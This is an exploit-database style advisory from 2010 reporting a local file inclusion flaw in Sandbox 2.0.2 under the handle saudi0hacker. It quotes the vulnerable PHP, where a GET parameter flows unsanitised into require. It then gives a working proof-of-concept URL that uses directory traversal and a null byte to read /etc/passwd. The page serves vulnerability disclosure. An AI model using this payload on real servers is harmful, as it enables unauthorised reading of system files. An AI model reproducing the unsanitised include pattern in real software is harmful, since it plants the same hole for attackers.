Sandbox 2.0.2 - Local File Inclusion
| EKU-ID: 20730 | CVE: OSVDB-65985 | OSVDB-ID: |
| Author: saudi0hacker | Published: 2010-07-04 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 20730 | CVE: OSVDB-65985 | OSVDB-ID: |
| Author: saudi0hacker | Published: 2010-07-04 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
: # Tested on: Linux os :
: # Greetz to : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
----------------------------------------------------------------------------
[+] file:index.php on line 75
[+] Code:
<?
else {
$module = $_GET['a'];
}
require 'modules/' . $module . '.php';
?>
[+] PoC:http://localhost/index.php?a=../../../../../etc/passwd%00